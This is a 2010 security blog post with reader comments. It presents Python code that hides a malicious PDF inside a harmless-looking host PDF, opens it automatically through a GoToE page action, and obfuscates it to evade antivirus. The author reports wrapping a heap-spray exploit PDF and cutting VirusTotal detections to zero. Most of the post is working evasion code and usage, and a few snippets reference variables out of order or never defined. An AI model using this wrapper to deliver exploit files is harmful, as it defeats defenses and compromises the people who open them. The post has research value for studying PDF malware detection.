Generic PDF exploit hider. embedPDF.py and goodbye AV detection (01/2010)

January 13, 2010


This post is about hiding an evil PDF into a saint PDF. The objective is to embed a pdf into another pdf, and make the reader parse the embedded one without user intervention. If we manage to do this we’ll be able to ‘filter’ the embedded file and hide it through some pdf encoding filters (flatedecode, crypt, etc), that way making it invisible from the outside. And at last, as we’ll be using miniPDF.py, we’ll pass everything through the (unfinished) obfuscated version of the miniPDF.py lib, here.


Hey! But, can we embed files into a PDF at all? Well as stated here …

PDS3200:2008::7.11.4 Embedded File Streams

If a PDF file contains file specifications that refer to an external file and the PDF file is archived or transmitted, some provision should be made to make sure that the external references will remain valid. One way to do this is to arrange for copies of the external files to accompany the PDF file. Embedded file streams (PDF 1.3) address this problem by allowing the contents of referenced files to be embedded directly within the body of the PDF file. This makes the PDF file a self-contained unit that can be stored or transmitted as a single entity. (The embedded files are included purely for convenience and need not be directly processed by any conforming reader.)

.. YES we can. There are probably other ways to embed files, as in the relatively new PDF ‘collection’ thing, but that’s other story.

I) Embeed a PDF into a PDF

OK, let’s start! First thing we need is a clean PDF to hide. I needs to be one with a correct xref and with a clean overall file structure. So, for a start we hide a good pdf, then we’ll see how to embed a bad one. There is a clean minimalistic text displaying pdf generated in this post, the pdf here.

Now we need to construct the host pdf. We are not really interesting in putting anything here so let’s construct an empty pdf (mostly as done for the JS-to_PDF post, here).

As in the earlier post first we import the lib and create a PDFDoc object representing a document in memory …

from miniPDF import *
#The PDF document
doc= PDFDoc()

Prepare the Pages dictionary, wich is in charge of linking to the pages..

pages = PDFDict()
pages.add(‘Type’, PDFName(‘Pages’))
doc.add(pages)

Prepare the Catalog dictionary.

catalog = PDFDict()
catalog.add(‘Type’, PDFName(‘Catalog’))
catalog.add(‘Pages’, PDFRef(pages))
doc.add(catalog)

The Catalog dictionary is the main root object of the PDF…

doc.setRoot(catalog)

We don’t really need any content on our pdf hosting PDF.
We add an empty content for the dummy page,

contents = PDFStream(”)
doc.add(contents)

and the single dummy page. Check out we NEED to honnor the Parent linking to the Pages dictionary, otherwise our magic won’t work.

page = PDFDict()
page.add(‘Type’, PDFName(‘Page’))
page.add(‘Parent’, PDFRef(pages))
page.add(‘Contents’, PDFRef(contents)) #<- NEEDED!
doc.add(page)

And finally populate the pages dictionary.

#link the page to the pages list
pages.add(‘Kids’,PDFArray([PDFRef(page)]))
pages.add(‘Count’, PDFNum(1))

And with this ..

print doc

it renders the incomplete base PDF to the stdout. Something like this.

The incomplete pdf is here and the incomplete py, here. OK, we have an empty base pdf, now let’s ..

Insert an embedded file.

For this we need to

  1. add the EmbeddedFile stream containing the actual embedded file data,
  2. build a FileSpec dictionary for it,
  3. construct the EmbeddedFiles list and
  4. put that under the global names list in the Catalog.
(1) To add the EmbeddedFile stream to the document do something like this.

Get the filename to hide form the parameters, and load its content to memory…

import sys
fileStr = file(sys.argv[1]).read()

Construct a EmbeddedFile Dictionary as stated in PDF3200:2008.1::7.11.4(Embedded File Streams)

ef = PDFStream(fileStr)
ef.add(‘Type’, PDFName(‘EmbeddedFile’))
ef.add(‘Subtype’,PDFName(‘application#2Fpdf’))
ef.add(‘Params’,PDFDict({‘Size': PDFNum(len(fileStr)),
‘CheckSum': PDFOctalString(md5.new(fileStr).digest())}) )
ef.add(‘DL’, ‘ %d ‘%len(fileStr))

Note that.. the ‘Type’, ‘SubType’ and ‘Params’ tags are not strictly necesary.

EXAMPLE: If we embeed a file containin only “AAAA” the resulting EmbeddedFile stream will look like…

N 0 obj
<<
  /Type /EmbeddedFile
  /Subtype /application#2Fpdf
  /DL  4
  /Length 4
  /Params <<  /CheckSum (\256\133\106\214\16707\241\363\323...
              /Size 5
          >>
>>
stream
AAAA
endstream
endobj
(2) Now we’ll construct the FileSpec dictionary for it.

As stated in the rather confusing PDF3200:2008.1::7.11.3(File Specification Dictionaries), a file specification dictionary for an embedded file will need to have this tags on it…

Key Type Value
Type Name The type of PDF object that this dictionary describes; shall be Filespec for a file specification dictionary.
F string A file specification string of the form described in PF3200:2008.1::7.11.2, “File Specification Strings,”
EF dictionary A dictionary containing a subset of the keys F, UF, DOS, Mac, and Unix, corresponding to the entries by those names in the file specification dictionary. The value of each such key shall be an embedded file stream (see 7.11.4, “Embedded File Streams”) containing the corresponding file. If this entry is present, the Type entry is required and the file specification dictionary shall be indirectly referenced.
The F and UF entries should be used in place of the DOS, Mac, or Unix entries.

So, my version of the FileSpec dictionary follows.

We need a dictionary containing a subset of the keys F, UF, DOS, Mac, and Unix, corresponding to the entries by those names in the file specification dictionary. And then put that under the EF tag in the Filespec dictionary. Damn! This is confusing. Basically we need a dictionary that looks like this…

<< /F N 0 R  >>

Where “N 0 R” refer to the embeddedFile Stream object. Here you have the code..

embeddedlst = PDFDict()
embeddedlst.add(‘F’,PDFRef(embedded))

Let’s construct the actual Filespec dictionary. Note that I’ve hardcoded the name to ‘file.pdf’ and that this should be revisited if we are trying to embed more than one file.

filespec = PDFDict()
filespec.add(‘Type’,PDFName(‘Filespec’))
filespec.add(‘F’,PDFString(‘file.pdf’))
filespec.add(‘EF’, embeddedlst)
doc.add(filespec)

Excelent!! We are getting closer to the ultimate PDF hider!! The Filespec dictionary will have this look ..

M 0 obj
<< /Type /Filespec
     /F (file.pdf)
     /EF << /F N 0 R >>
>>
endobj
(3) Now we need to build the EmbeddedFiles list.

That’s easy, just build a dictionary that has a Names tag. Then put an array of pairs mapping an utf-16 encoded name to the filespec dictionary. In few words it should be something like this…

<<
   /Names [<fffe610074007400610063006800> M 0 R]
>>

… where <fffe610074007400610063006800> is the utf-16 PDFHexString of the string “attach” and “M 0 R” is a reference to the filespec dictionary.

names = PDFDict()
names.add(‘EmbeddedFiles’,namesToFiles)

And then just add the names dictionary to the document and reference it from the Catalog. And the code will be similar to this…

namesToFiles = PDFDict()
namesToFiles.add(‘Names’, PDFArray([PDFHexString('attach'.encode('utf-16')),PDFRef(filespec)] ))
(4) And finally we put it under the global names list in the Catalog.

We create the Names dictionary and add it to the document…

names = PDFDict()
doc.add(names)

… then add the EmbeddedFiles entry as stated in PDF3200:1008.1::7.7.4(Name Dictionary). And finally link it from the Catalog.

names.add(‘EmbeddedFiles’,namesToFiles)
catalog.add(‘Names’, PDFRef(names))

WE HAVE EMBEDDED A FILE!!!

The yet incomplete PDF with an embedded file containing “AAAA” is demostrated here,  an it actually have something under the ‘paper clip’, check it out …

II) Jump to the embedded PDF with GoToE

Now than we have added an embedded pdf to a pdf we’ll want to jump to it without user intervention and (why not) without javascript.

For this we’ll set up a GoToE action and link it to the OpenAction or some other trigger dictionary in the document.
An action dictionary defines the characteristics and behaviour of an action, and it is described in PDF3200:1008.1::12.6.2(Action Dictionaries).

Embedded go-to actions give a complete facility for linking between a file in a hierarchy of nested embedded files and another file in the same or different hierarchy. The GoToE action is described in PDF3200:1008.1::12.6.4.4(Embedded Go-To Actions), but basically they have this look…

<<
  /S /GoToE
  /T <</N <fffe610074007400610063006800>
       /R /C
       /NewWindow false
     >>
  /NewWindow false
>>

…where the N tag refers to the utf-16 encoded name of the embedded file. The code for this action follows.

action = PDFDict()
action.add(‘S’,PDFName(‘GoToE’))
action.add(‘NewWindow’,PDFBool(False))
action.add(‘T’,PDFDict({‘N': name, ‘R': PDFName(‘C’), ‘NewWindow': PDFBool(False)}))
doc.add(action)

Setting the NewWindow tag to True or False may change how the reader opens the hided file. Funny things may happen when run from inside a browser (!).

OK, all we have left is linking this action to some trigger that wouldn’t call the user attention.. well we have OpenAction but let’s try something a lil different now. Let’s put one of those AA trigger dictionaries to our single dummy page on the host pdf. That’s done with something like this…

page.add(‘AA’,PDFDict({‘O': PDFRef(action)}))

And finally render it out to stdout…

print doc #:)

And as we expect the pdf to hide in hte parameters.. we can use it like this…

python embeddPDF.pdf evil.pdf > goodness.pdf

For a quick look on a representative sample of this code check here.

III) The virustotal.com test

It’s time for the virustotal.com test. I’ll try to hide the evilness of some PDF embedding it into one of our hosts PDF, as described previously, and see what happens.

I’m tired so I’ll pick one not-so-evil pdf I got from my previous post.  So I got this pdf which is a small pdf with a javascrip openaction featuring an obcene heap spray usually easily detected by AVs. That gave this result on virustotal.com, a 14 over 41 score.

Now lets embed it by our embeddPDF.py… I got this pdf. And when pass it to virustotal.com it got detected by 2 of 41 AVs.  Here you have the result. Damn! 0 out of 41 seems to be hard to get. Let’s try it again but this time using the obfuscated miniPDF.py version piled on the embeddPDF.py. I got this pdf. I passed it to virustotal… and got

-danger- !! 0/41 !! -danger-

No AV have detected it!!

I suppose there are 1mill ways to accomplish this but it still feels g00d! The results here.

A complete test bundle with most of the code is here.

f/

UPDATE(5:19 AM Jan 17th) ::

Nice! We had an improvement! Now detected in 3/41 AVs. http://bit.ly/8Xabw4.

About these ads

10 Responses to “Generic PDF exploit hider. embedPDF.py and goodbye AV detection (01/2010)”

  1. [...] fund targeted attacks, IE didn’t have multiple zero-day exploits, and a proof of concept embedded malicious PDF exploit had not just been released. Can you say ‘Beijing [...]

  2. dlimanov said

    Good research, but disabling JavaScript in Adobe (which everyone using Adobe should absolutely do) blocks it.

    • feliam said

      Disabling JavaScript disables nothing but javascript. Though, it will block javascript bugs and also exploits of any kind that use javascript for heapspray or for some memory massaging technique. But remember that really, really bad guys don’t use javascript for their exploits.
      In this Post I used JS just as a demo payload and not for the main functioning of the obfuscation.

  3. Robin said

    Just given this a try using the exploit PDF mentioned in the article and VirusTotal is giving me 16/41 for the embedded file vs 23/41 for the plain document so looks like the process still has some merit but is being detected by most of the major vendors now.

  4. dave said

    Hey feliam, forgive my ignorance if this is a stupid question, but did you ever actually get the javascript in the embedded pdf to execute? I’ve tried numerous times with just a simple js popup alert box, as well as a heap spray exploit with a calc spawn payload but had no luck. I tried it with pdfs I had created, as well as editing testx.pdf that you supplied (made sure to update the xref table as well) but still had no luck.

    Any chance you could point out where I’m going wrong? Cheers!

  5. Mihail said

    It is kinda pointless though – with the eyes of a former pro malware researcher – as AV engines will easily unpack all of your layers (embeddedfile, flatedecode). And ur 0/41 danger ratio is impressive, but did U check if it even worked? Same for 2/41, or your goal was just to put something-malicious-looking inside a PDF, and see how many scanners didnt notice it?

    • feliam said

      This is old now and I’m not sure if this particular technique still works. Probably adobe has stopped opening the embedded file from the OpenAction/GoToE action.
      In any case I wouldn’t go as far as saying they will ‘easily unpack’ every layer. They have to put together a complete parser that may handle all corner cases. Consider combining static filter/encryption, pdf actions, javascript, flash, xfa, xslt and xpath together. AV-zilla alert!

      3 years ago this worked like charm. I could put whatever inside and no AV reported anything.
      This was just a PoC showing that at that point bypassing AV was easy.
      My hypothesis: at any given time there are 2347896238946 ways of doing this in pdf and no AV will save you from targeted attacks. Nah, I’m probably wrong.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Follow

Get every new post delivered to your Inbox.

%d bloggers like this: